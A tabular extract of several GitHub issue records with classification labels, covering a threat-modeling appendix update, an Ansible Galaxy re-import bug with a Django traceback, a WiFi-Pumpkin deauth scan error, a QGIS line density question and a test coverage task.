685,190 | 23,447,294,173 | IssuesEvent | 2022-08-15 21:04:31 | Anon-Planet/thgtoa | https://api.github.com/repos/Anon-Planet/thgtoa | closed | Threat Modeling Appendix B3 update | medium priority Information Update New Information Delete information Review request | Updates on the Threat Modeling Appendix B3:
1. Recommending LINDDUN
2. Possibly add the video mentioned in the collab room
3. Remove OWASP Links (clearly it's meant for web developers)
4. Moving STRIDE and PASTA in the below section (other resources available)
See Draft PR #187 | 1.0 | Threat Modeling Appendix B3 update - Updates on the Threat Modeling Appendix B3:
1. Recommending LINDDUN
2. Possibly add the video mentioned in the collab room
3. Remove OWASP Links (clearly it's meant for web developers)
4. Moving STRIDE and PASTA in the below section (other resources available)
See Draft PR #187 | non_process | threat modeling appendix update updates on the threat modeling appendix recommending linddun possibly add the video mentioned in the collab room remove owasp links clearly it s meant for web developers moving stride and pasta in the below section other resources available see draft pr | 0 |
243,653 | 7,860,339,251 | IssuesEvent | 2018-06-21 19:37:10 | ansible/galaxy | https://api.github.com/repos/ansible/galaxy | opened | Re-import of already imported repository fails with PermissionDenied error | area/backend priority/critical type/bug | ## Bug Report
##### SUMMARY
When trying to import already imported repository, import process fails with error 500.
##### STEPS TO REPRODUCE
1. Import repository
2. Open page "My Imports"
3. Go to repository imported on step 1.
4. Press import button (on the top right corner of the page).
##### EXPECTED RESULTS
Import process is started.
##### ACTUAL RESULTS
Server fails with `TypeError` exception:
```
Traceback (most recent call last):
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/exception.py", line 41, in inner
response = get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 249, in _legacy_get_response
response = self._get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 187, in _get_response
response = self.process_exception_by_middleware(e, request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 185, in _get_response
response = wrapped_callback(request, *callback_args, **callback_kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/decorators/csrf.py", line 58, in wrapped_view
return view_func(*args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/generic/base.py", line 68, in view
return self.dispatch(request, *args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 494, in dispatch
response = self.handle_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 454, in handle_exception
self.raise_uncaught_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 491, in dispatch
response = handler(request, *args, **kwargs)
File "/galaxy/galaxy/api/views/views.py", line 412, in post
raise PermissionDenied(detail="You are not an owner of {0}".format(repository.name))
```
So there are two problems in the code:
1. `TypeError` exception is raised due to invalid call of `PermissionDenied` class.
2. `PermissionDenied` exception would have been triggered if called correctly, which is invalid behavior for repository imported by a user himself.
| 1.0 | Re-import of already imported repository fails with PermissionDenied error - ## Bug Report
##### SUMMARY
When trying to import already imported repository, import process fails with error 500.
##### STEPS TO REPRODUCE
1. Import repository
2. Open page "My Imports"
3. Go to repository imported on step 1.
4. Press import button (on the top right corner of the page).
##### EXPECTED RESULTS
Import process is started.
##### ACTUAL RESULTS
Server fails with `TypeError` exception:
```
Traceback (most recent call last):
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/exception.py", line 41, in inner
response = get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 249, in _legacy_get_response
response = self._get_response(request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 187, in _get_response
response = self.process_exception_by_middleware(e, request)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/core/handlers/base.py", line 185, in _get_response
response = wrapped_callback(request, *callback_args, **callback_kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/decorators/csrf.py", line 58, in wrapped_view
return view_func(*args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/django/views/generic/base.py", line 68, in view
return self.dispatch(request, *args, **kwargs)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 494, in dispatch
response = self.handle_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 454, in handle_exception
self.raise_uncaught_exception(exc)
File "/var/lib/galaxy/venv/lib/python2.7/site-packages/rest_framework/views.py", line 491, in dispatch
response = handler(request, *args, **kwargs)
File "/galaxy/galaxy/api/views/views.py", line 412, in post
raise PermissionDenied(detail="You are not an owner of {0}".format(repository.name))
```
So there are two problems in the code:
1. `TypeError` exception is raised due to invalid call of `PermissionDenied` class.
2. `PermissionDenied` exception would have been triggered if called correctly, which is invalid behavior for repository imported by a user himself.
| non_process | re import of already imported repository fails with permissiondenied error bug report summary when trying to import already imported repository import process fails with error steps to reproduce import repository open page my imports go to repository imported on step press import button on the top right corner of the page expected results import process is started actual results server fails with typeerror exception traceback most recent call last file var lib galaxy venv lib site packages django core handlers exception py line in inner response get response request file var lib galaxy venv lib site packages django core handlers base py line in legacy get response response self get response request file var lib galaxy venv lib site packages django core handlers base py line in get response response self process exception by middleware e request file var lib galaxy venv lib site packages django core handlers base py line in get response response wrapped callback request callback args callback kwargs file var lib galaxy venv lib site packages django views decorators csrf py line in wrapped view return view func args kwargs file var lib galaxy venv lib site packages django views generic base py line in view return self dispatch request args kwargs file var lib galaxy venv lib site packages rest framework views py line in dispatch response self handle exception exc file var lib galaxy venv lib site packages rest framework views py line in handle exception self raise uncaught exception exc file var lib galaxy venv lib site packages rest framework views py line in dispatch response handler request args kwargs file galaxy galaxy api views views py line in post raise permissiondenied detail you are not an owner of format repository name so there are two problems in the code typeerror exception is raised due to invalid call of permissiondenied class permissiondenied exception would have been triggered if called correctly which is invalid behavior for repository imported by a user himself | 0 |
1,772 | 4,479,946,076 | IssuesEvent | 2016-08-27 23:17:41 | P0cL4bs/WiFi-Pumpkin | https://api.github.com/repos/P0cL4bs/WiFi-Pumpkin | closed | Deauth not populating for scapy or airodump-ng | in process priority | Using Kali with ALFA AWUS036NH and get nothing populated with settings to use Scapy and get the following in the terminal when choosing airodump-ng for the scan:
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "/usr/share/WiFi-Pumpkin/Modules/wireless/WirelessDeauth.py", line 153, in scan_diveces_airodump
exit_air = airdump_start(self.interface)
File "/usr/share/WiFi-Pumpkin/Core/utility/extract.py", line 33, in airdump_start
process.start()
File "/usr/share/WiFi-Pumpkin/Core/utility/threads.py", line 155, in start
self.procThread.start(self.cmd.keys()[0],self.cmd[self.cmd.keys()[0]])
AttributeError: 'list' object has no attribute 'keys' | 1.0 | Deauth not populating for scapy or airodump-ng - Using Kali with ALFA AWUS036NH and get nothing populated with settings to use Scapy and get the following in the terminal when choosing airodump-ng for the scan:
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "/usr/share/WiFi-Pumpkin/Modules/wireless/WirelessDeauth.py", line 153, in scan_diveces_airodump
exit_air = airdump_start(self.interface)
File "/usr/share/WiFi-Pumpkin/Core/utility/extract.py", line 33, in airdump_start
process.start()
File "/usr/share/WiFi-Pumpkin/Core/utility/threads.py", line 155, in start
self.procThread.start(self.cmd.keys()[0],self.cmd[self.cmd.keys()[0]])
AttributeError: 'list' object has no attribute 'keys' | process | deauth not populating for scapy or airodump ng using kali with alfa and get nothing populated with settings to use scapy and get the following in the terminal when choosing airodump ng for the scan exception in thread thread traceback most recent call last file usr lib threading py line in bootstrap inner self run file usr lib threading py line in run self target self args self kwargs file usr share wifi pumpkin modules wireless wirelessdeauth py line in scan diveces airodump exit air airdump start self interface file usr share wifi pumpkin core utility extract py line in airdump start process start file usr share wifi pumpkin core utility threads py line in start self procthread start self cmd keys self cmd attributeerror list object has no attribute keys | 1 |
11,619 | 14,483,924,967 | IssuesEvent | 2020-12-10 15:43:44 | qgis/QGIS | https://api.github.com/repos/qgis/QGIS | closed | Weird output from "Line density" function | Bug Feedback Processing | Hello everyone,
I ran the "line density" function in QGIS, but the result is just some horizontal stripes. I am using Linux version of QGIS. I have attached a screenshot of the resulted layer and the settings I used here: https://www.dropbox.com/s/8ylkdj107vfxwig/line_density.png?dl=0
I am not sure if it is a bug?
Many thanks | 1.0 | Weird output from "Line density" function - Hello everyone,
I ran the "line density" function in QGIS, but the result is just some horizontal stripes. I am using Linux version of QGIS. I have attached a screenshot of the resulted layer and the settings I used here: https://www.dropbox.com/s/8ylkdj107vfxwig/line_density.png?dl=0
I am not sure if it is a bug?
Many thanks | process | weird output from line density function hello everyone i ran the line density function in qgis but the result is just some horizontal stripes i am using linux version of qgis i have attached a screenshot of the resulted layer and the settings i used here i am not sure if it is a bug many thanks | 1 |
3,780 | 6,759,735,319 | IssuesEvent | 2017-10-24 18:08:09 | EPFLMachineLearningTeam01/Project1 | https://api.github.com/repos/EPFLMachineLearningTeam01/Project1 | closed | Analyze correlation matrix | data processing | Correlation or covariance matrix in order to see relation among features how much they depend on each other | 1.0 | Analyze correlation matrix - Correlation or covariance matrix in order to see relation among features how much they depend on each other | process | analyze correlation matrix correlation or covariance matrix in order to see relation among features how much they depend on each other | 1 |
55,568 | 23,504,427,366 | IssuesEvent | 2022-08-18 11:20:29 | hashicorp/nomad | https://api.github.com/repos/hashicorp/nomad | opened | nomad-sd: support the service meta field inline with Consul | type/enhancement theme/jobspec stage/accepted theme/service-discovery/nomad | ### Proposal
The Consul service integration supports [meta](https://www.nomadproject.io/docs/job-specification/service#meta) and [canary_meta](https://www.nomadproject.io/docs/job-specification/service#canary_meta) service parameters which are useful alongside tags as they are a key/value mapping rather than an array. It would be nice if these were also supported on Nomad services.
Please see https://github.com/hashicorp/nomad/issues/12589 for additional comments.
| 1.0 | nomad-sd: support the service meta field inline with Consul - ### Proposal
The Consul service integration supports [meta](https://www.nomadproject.io/docs/job-specification/service#meta) and [canary_meta](https://www.nomadproject.io/docs/job-specification/service#canary_meta) service parameters which are useful alongside tags as they are a key/value mapping rather than an array. It would be nice if these were also supported on Nomad services.
Please see https://github.com/hashicorp/nomad/issues/12589 for additional comments.
| non_process | nomad sd support the service meta field inline with consul proposal the consul service integration supports and service parameters which are useful alongside tags as they are a key value mapping rather than an array it would be nice if these were also supported on nomad services please see for additional comments | 0 |
174,626 | 13,501,083,886 | IssuesEvent | 2020-09-13 00:23:34 | open-contracting/lib-cove-ocds | https://api.github.com/repos/open-contracting/lib-cove-ocds | opened | Increase code coverage | testing | * [ ] schema.py: Extension-related code and error conditions
* [ ] lib/common_checks.py: Bad OCID prefix checks
* [ ] common_checks.py: Some if-else branches
Lower priority:
* [ ] api.py: Non-JSON input
* [ ] cli/__main__.py: All lines (see OCDS Kit for how to test)
| 1.0 | Increase code coverage - * [ ] schema.py: Extension-related code and error conditions
* [ ] lib/common_checks.py: Bad OCID prefix checks
* [ ] common_checks.py: Some if-else branches
Lower priority:
* [ ] api.py: Non-JSON input
* [ ] cli/__main__.py: All lines (see OCDS Kit for how to test)
| non_process | increase code coverage schema py extension related code and error conditions lib common checks py bad ocid prefix checks common checks py some if else branches lower priority api py non json input cli main py all lines see ocds kit for how to test | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.